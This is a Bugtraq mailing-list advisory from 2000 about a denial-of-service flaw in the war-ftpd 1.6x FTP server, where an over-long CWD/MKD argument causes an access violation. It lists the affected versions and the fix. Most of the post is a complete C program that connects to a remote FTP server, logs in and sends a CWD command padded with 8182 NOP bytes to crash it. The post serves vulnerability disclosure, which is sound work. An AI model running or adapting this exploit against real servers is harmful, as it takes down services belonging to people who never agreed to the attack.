[13664] in bugtraq
war-ftpd 1.6x DoS
daemon@ATHENA.MIT.EDU (Toshimi Makino)
Wed Feb 2 15:57:25 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <38969236225.C3BFCRC@mail.sft.sega.co.jp>
Date: Tue, 1 Feb 2000 16:58:46 +0900
Reply-To: Toshimi Makino <crc@SIRIUS.IMASY.OR.JP>
From: Toshimi Makino <crc@SIRIUS.IMASY.OR.JP>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
"war-ftpd" is very popular ftp server for Windows95/98/NT.
I found DoS problem to "war-ftpd 1.6x" recently.
Outline:
It seems to occur because the bound check of the command of MKD/CWD
that uses it is imperfect when this problem controls the directory.
However, could not hijack the control of EIP so as long as I test.
It is because not able to overwrite the RET address,
because it seems to be checking buffer total capacity properly
in 1.66x4 and later.
The boundary of Access Violation breaks out among 8182 bytes
from 533 bytes neighborhood although it differs by the thread
that receives attack.
The version that is confirming this vulnerable point is as follows.
1.66x4s, 1.67-3
The version that this vulnerable point was not found is as follows.
1.71-0
Test Environments:
Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2
Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2
Microsoft WindowsNT 4.0 Server SP4 Japanese version
Solution:
1.70-1 should be used to solve this problem fundamentally.
Because it becomes "Access denied" in 1.71-0 DoS did not break out.
---
warftpd-dos.c
I coded program for the reappearance of this problem.
The contents apply DoS attack for "war-ftpd" to the server
who is working from the remote.
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
void main(int argc,char *argv[])
{
SOCKET sock;
unsigned long victimaddr;
SOCKADDR_IN victimsockaddr;
WORD wVersionRequested;
int nErrorStatus;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
hostent *victimhostent;
WSADATA wsa;
if (argc < 3){
printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
nErrorStatus = WSAStartup(wVersionRequested, &wsa);
if (atexit((void (*)(void))(WSACleanup))) {
fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
}
if ( nErrorStatus != 0 ) {
fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
fprintf(stderr,"Can't create socket.\n"); exit(-1);
}
victimaddr = inet_addr((char*)argv[1]);
if (victimaddr == -1) {
victimhostent = gethostbyname(argv[1]);
if (victimhostent == NULL) {
fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
}
else
victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
}
victimsockaddr.sin_family = AF_INET;
victimsockaddr.sin_addr.s_addr = victimaddr;
victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
fprintf(stderr,"Connection refused.\n"); exit(-1);
}
printf("Attacking war-ftpd ...\n");
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
Sleep(100);
shutdown(sock, 2);
closesocket(sock);
WSACleanup();
printf("done.\n");
}
----
Toshimi Makino E-mail:crc@sirius.imasy.or.jp
